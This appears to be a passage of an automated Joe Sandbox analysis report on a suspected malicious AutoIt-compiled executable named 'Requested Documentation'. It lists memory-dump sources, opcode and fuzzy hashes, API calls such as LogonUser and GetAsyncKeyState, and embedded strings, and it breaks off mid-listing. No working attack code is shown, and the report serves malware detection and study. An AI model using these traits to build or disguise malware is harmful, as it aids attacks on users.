• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: 259bb6160c0945c9ad0fcfb9aa43b2139889ef7966a9ac5e4c41dfac3020759f
• Instruction ID: d0fb77535a9992a077eb880b69fa33b4d64eca6e3c0a6bdab008f95fba734f3a
• Opcode Fuzzy Hash: 259bb6160c0945c9ad0fcfb9aa43b2139889ef7966a9ac5e4c41dfac3020759f
• Instruction Fuzzy Hash: A9D05E3226050EAFEF01CEA4DC01EAF3B69EB04B01F408111FE15D50A1C775D836AB60
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 009AA12A
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: e33dadea4bb384c17be5e840353dc1bfde983e1c773ea60818b03d32803893d2
• Instruction ID: 1ab9c6ae98f72a329442e2f0cd775c7ebba47b5d486f32042c2139192b5e40ba
• Opcode Fuzzy Hash: e33dadea4bb384c17be5e840353dc1bfde983e1c773ea60818b03d32803893d2
• Instruction Fuzzy Hash: 3CA0123000410CABCA001B81EC044447F5CD6002A07004020F40C44421873254124581
Memory Dump Source
• Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 39266abeab2f53391023ff4bc6766ed2e68c92e5937f785aa0aa6c0f059a2663
• Instruction ID: 361a4b0eefca7810a32342d0946e3545ec0dc05a1b49fd882ad495da0e68f2da
• Opcode Fuzzy Hash: 39266abeab2f53391023ff4bc6766ed2e68c92e5937f785aa0aa6c0f059a2663
• Instruction Fuzzy Hash: BE224430904506CBDF288A6CC49477EB7A9FB02344F39886FE9568B692DB34DD91CB51
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 009F785B
                                                                              • DeleteObject.GDI32(00000000), ref: 009F786D
                                                                              • DestroyWindow.USER32 ref: 009F787B
                                                                              • GetDesktopWindow.USER32 ref: 009F7895
                                                                              • GetWindowRect.USER32(00000000), ref: 009F789C
                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009F79DD
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009F79ED
                                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7A35
                                                                              • GetClientRect.USER32(00000000,?), ref: 009F7A41
                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 009F7A7B
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7A9D
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7AB0
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7ABB
                                                                              • GlobalLock.KERNEL32(00000000), ref: 009F7AC4
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7AD3
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 009F7ADC
                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7AE3
                                                                              • GlobalFree.KERNEL32(00000000), ref: 009F7AEE
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7B00
                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00A12CAC,00000000), ref: 009F7B16
                                                                              • GlobalFree.KERNEL32(00000000), ref: 009F7B26
                                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 009F7B4C
                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 009F7B6B
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7B8D
                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 009F7D7A
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                              • API String ID: 2211948467-2373415609
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(?,?,00A0F910), ref: 00A03627
                                                                              • IsWindowVisible.USER32(?), ref: 00A0364B
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: BuffCharUpperVisibleWindow
                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                              • API String ID: 4105515805-45149045
                                                                              APIs
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00A0A630
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00A0A661
                                                                              • GetSysColor.USER32(0000000F), ref: 00A0A66D
                                                                              • SetBkColor.GDI32(?,000000FF), ref: 00A0A687
                                                                              • SelectObject.GDI32(?,00000000), ref: 00A0A696
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00A0A6C1
                                                                              • GetSysColor.USER32(00000010), ref: 00A0A6C9
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00A0A6D0
                                                                              • FrameRect.USER32(?,?,00000000), ref: 00A0A6DF
                                                                              • DeleteObject.GDI32(00000000), ref: 00A0A6E6
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00A0A731
                                                                              • FillRect.USER32(?,?,00000000), ref: 00A0A763
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A0A78E
                                                                                • Part of subcall function 00A0A8CA: GetSysColor.USER32(00000012), ref: 00A0A903
                                                                                • Part of subcall function 00A0A8CA: SetTextColor.GDI32(?,?), ref: 00A0A907
                                                                                • Part of subcall function 00A0A8CA: GetSysColorBrush.USER32(0000000F), ref: 00A0A91D
                                                                                • Part of subcall function 00A0A8CA: GetSysColor.USER32(0000000F), ref: 00A0A928
                                                                                • Part of subcall function 00A0A8CA: GetSysColor.USER32(00000011), ref: 00A0A945
                                                                                • Part of subcall function 00A0A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A0A953
                                                                                • Part of subcall function 00A0A8CA: SelectObject.GDI32(?,00000000), ref: 00A0A964
                                                                                • Part of subcall function 00A0A8CA: SetBkColor.GDI32(?,00000000), ref: 00A0A96D
                                                                                • Part of subcall function 00A0A8CA: SelectObject.GDI32(?,?), ref: 00A0A97A
                                                                                • Part of subcall function 00A0A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00A0A999
                                                                                • Part of subcall function 00A0A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A0A9B0
                                                                                • Part of subcall function 00A0A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00A0A9C5
                                                                                • Part of subcall function 00A0A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A0A9ED
                                                                              Similarity
                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 3521893082-0
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?), ref: 00982CA2
                                                                              • DeleteObject.GDI32(00000000), ref: 00982CE8
                                                                              • DeleteObject.GDI32(00000000), ref: 00982CF3
                                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00982CFE
                                                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00982D09
                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 009BC43B
                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 009BC474
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 009BC89D
                                                                                • Part of subcall function 00981B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00982036,?,00000000,?,?,?,?,009816CB,00000000,?), ref: 00981B9A
                                                                              • SendMessageW.USER32(?,00001053), ref: 009BC8DA
                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 009BC8F1
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 009BC907
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 009BC912
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                              • String ID: 0
                                                                              • API String ID: 464785882-4108050209
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000), ref: 009F74DE
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009F759D
                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009F75DB
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009F75ED
                                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 009F7633
                                                                              • GetClientRect.USER32(00000000,?), ref: 009F763F
                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 009F7683
                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009F7692
                                                                              • GetStockObject.GDI32(00000011), ref: 009F76A2
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 009F76A6
                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009F76B6
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009F76BF
                                                                              • DeleteDC.GDI32(00000000), ref: 009F76C8
                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009F76F4
                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 009F770B
                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 009F7746
                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 009F775A
                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 009F776B
                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 009F779B
                                                                              • GetStockObject.GDI32(00000011), ref: 009F77A6
                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009F77B1
                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009F77BB
                                                                              Strings
                                                                              Similarity
                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                              • API String ID: 2910397461-517079104
                                                                              • Opcode ID: dbbeda1b386b3822a72c3540dc6612b8d5b97fa640b11ed4f44597582ca05af1
                                                                              • Instruction ID: 98a0cd0db0c2431d9abc22d3626176894a3ab60f4162d2372192e92e0902997a
                                                                              • Opcode Fuzzy Hash: dbbeda1b386b3822a72c3540dc6612b8d5b97fa640b11ed4f44597582ca05af1
                                                                              • Instruction Fuzzy Hash: 23A17075A40609BFEB14DBA4DC4AFBEBBB9EB45710F004115FA14A72E1D7B1AD02CB60
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 009EAD1E
                                                                              • GetDriveTypeW.KERNEL32(?,00A0FAC0,?,\\.\,00A0F910), ref: 009EADFB
                                                                              • SetErrorMode.KERNEL32(00000000,00A0FAC0,?,\\.\,00A0F910), ref: 009EAF59
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DriveType
                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                              • API String ID: 2907320926-4222207086
                                                                              • Opcode ID: ac8fa797f1b3c8c023d85d09751e77af7540ca17569aed4878e0219b03c0afa9
                                                                              • Instruction ID: cddde1eb586f512a1d62abba406f131001a07273aaa32d173fc7c81d704930f5
                                                                              • Opcode Fuzzy Hash: ac8fa797f1b3c8c023d85d09751e77af7540ca17569aed4878e0219b03c0afa9
                                                                              • Instruction Fuzzy Hash: 4051B1B0648245ABCB12EB52C982DBDB3A4FF4C700B608D56F407A72B1CA39BD41DB52
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                              • API String ID: 1038674560-86951937
                                                                              • Opcode ID: ce6ef88b49b388d2b2120b75106cff144e22867517c0781598f8c337e55b28f5
                                                                              • Instruction ID: d938252e6af64d236c6a9b93db7196b190d229efd8ad823227f931df8caf1175
                                                                              • Opcode Fuzzy Hash: ce6ef88b49b388d2b2120b75106cff144e22867517c0781598f8c337e55b28f5
                                                                              • Instruction Fuzzy Hash: 588110B0600205BBCB21BA60EC83FEA77ACAF56710F044424F945AE2D2EB61DE45D7A1
                                                                              APIs
                                                                              • GetSysColor.USER32(00000012), ref: 00A0A903
                                                                              • SetTextColor.GDI32(?,?), ref: 00A0A907
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00A0A91D
                                                                              • GetSysColor.USER32(0000000F), ref: 00A0A928
                                                                              • CreateSolidBrush.GDI32(?), ref: 00A0A92D
                                                                              • GetSysColor.USER32(00000011), ref: 00A0A945
                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A0A953
                                                                              • SelectObject.GDI32(?,00000000), ref: 00A0A964
                                                                              • SetBkColor.GDI32(?,00000000), ref: 00A0A96D
                                                                              • SelectObject.GDI32(?,?), ref: 00A0A97A
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00A0A999
                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A0A9B0
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00A0A9C5
                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A0A9ED
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00A0AA14
                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00A0AA32
                                                                              • DrawFocusRect.USER32(?,?), ref: 00A0AA3D
                                                                              • GetSysColor.USER32(00000011), ref: 00A0AA4B
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00A0AA53
                                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00A0AA67
                                                                              • SelectObject.GDI32(?,00A0A5FA), ref: 00A0AA7E
                                                                              • DeleteObject.GDI32(?), ref: 00A0AA89
                                                                              • SelectObject.GDI32(?,?), ref: 00A0AA8F
                                                                              • DeleteObject.GDI32(?), ref: 00A0AA94
                                                                              • SetTextColor.GDI32(?,?), ref: 00A0AA9A
                                                                              • SetBkColor.GDI32(?,?), ref: 00A0AAA4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 1996641542-0
                                                                              • Opcode ID: ea52a282e526faac68a4346c007db95e21b2b7f36b3b84398e2a60885fc45e50
                                                                              • Instruction ID: 28e09dc123cff3d3c0610a42eeebdc8cf5fbdaba9581a2fb56e9c4447b05d17f
                                                                              • Opcode Fuzzy Hash: ea52a282e526faac68a4346c007db95e21b2b7f36b3b84398e2a60885fc45e50
                                                                              • Instruction Fuzzy Hash: 95512B7190020CEFDB21DFA4DC48EAE7BB9EB48320F114625FA11BB2A1D7719942DF90
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A08AC1
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A08AD2
                                                                              • CharNextW.USER32(0000014E), ref: 00A08B01
                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A08B42
                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A08B58
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A08B69
                                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00A08B86
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00A08BD8
                                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00A08BEE
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A08C1F
                                                                              • _memset.LIBCMT ref: 00A08C44
                                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00A08C8D
                                                                              • _memset.LIBCMT ref: 00A08CEC
                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A08D16
                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00A08D6E
                                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00A08E1B
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00A08E3D
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A08E87
                                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A08EB4
                                                                              • DrawMenuBar.USER32(?), ref: 00A08EC3
                                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00A08EEB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                              • String ID: 0
                                                                              • API String ID: 1073566785-4108050209
                                                                              • Opcode ID: 6df3bf1f9a1d7c595a516c1c9e89f4631839d74e0344f467621b7bf27dea1dd0
                                                                              • Instruction ID: 4fc3944f9952503e851056c6e89c84be5e1da8c6842a56644da1b6ab45f07b94
                                                                              • Opcode Fuzzy Hash: 6df3bf1f9a1d7c595a516c1c9e89f4631839d74e0344f467621b7bf27dea1dd0
                                                                              • Instruction Fuzzy Hash: 74E17D7090020DAFDF20DFA0DC84AEE7BB9EF49750F108156F955AA2D1DB788981DF64
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 00A049CA
                                                                              • GetDesktopWindow.USER32 ref: 00A049DF
                                                                              • GetWindowRect.USER32(00000000), ref: 00A049E6
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A04A48
                                                                              • DestroyWindow.USER32(?), ref: 00A04A74
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00A04A9D
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A04ABB
                                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00A04AE1
                                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00A04AF6
                                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00A04B09
                                                                              • IsWindowVisible.USER32(?), ref: 00A04B29
                                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00A04B44
                                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00A04B58
                                                                              • GetWindowRect.USER32(?,?), ref: 00A04B70
                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00A04B96
                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00A04BB0
                                                                              • CopyRect.USER32(?,?), ref: 00A04BC7
                                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00A04C32
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                              • String ID: ($0$tooltips_class32
                                                                              • API String ID: 698492251-4156429822
                                                                              • Opcode ID: b1d2d6a46db88a256efad487cdaf81cd91646629e2a848ba86e0a581a4631469
                                                                              • Instruction ID: f0a12d9f49aec77818216c92de7993e0bd84e754ecec697b2afb293676bdd17c
                                                                              • Opcode Fuzzy Hash: b1d2d6a46db88a256efad487cdaf81cd91646629e2a848ba86e0a581a4631469
                                                                              • Instruction Fuzzy Hash: 3AB18CB1604344AFDB04DF64D844B6ABBE4BF88350F048A1DF699AB2A1D771EC06CB55
                                                                              APIs
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009828BC
                                                                              • GetSystemMetrics.USER32(00000007), ref: 009828C4
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 009828EF
                                                                              • GetSystemMetrics.USER32(00000008), ref: 009828F7
                                                                              • GetSystemMetrics.USER32(00000004), ref: 0098291C
                                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00982939
                                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00982949
                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0098297C
                                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00982990
                                                                              • GetClientRect.USER32(00000000,000000FF), ref: 009829AE
                                                                              • GetStockObject.GDI32(00000011), ref: 009829CA
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 009829D5
                                                                                • Part of subcall function 00982344: GetCursorPos.USER32(?), ref: 00982357
                                                                                • Part of subcall function 00982344: ScreenToClient.USER32(00A457B0,?), ref: 00982374
                                                                                • Part of subcall function 00982344: GetAsyncKeyState.USER32(00000001), ref: 00982399
                                                                                • Part of subcall function 00982344: GetAsyncKeyState.USER32(00000002), ref: 009823A7
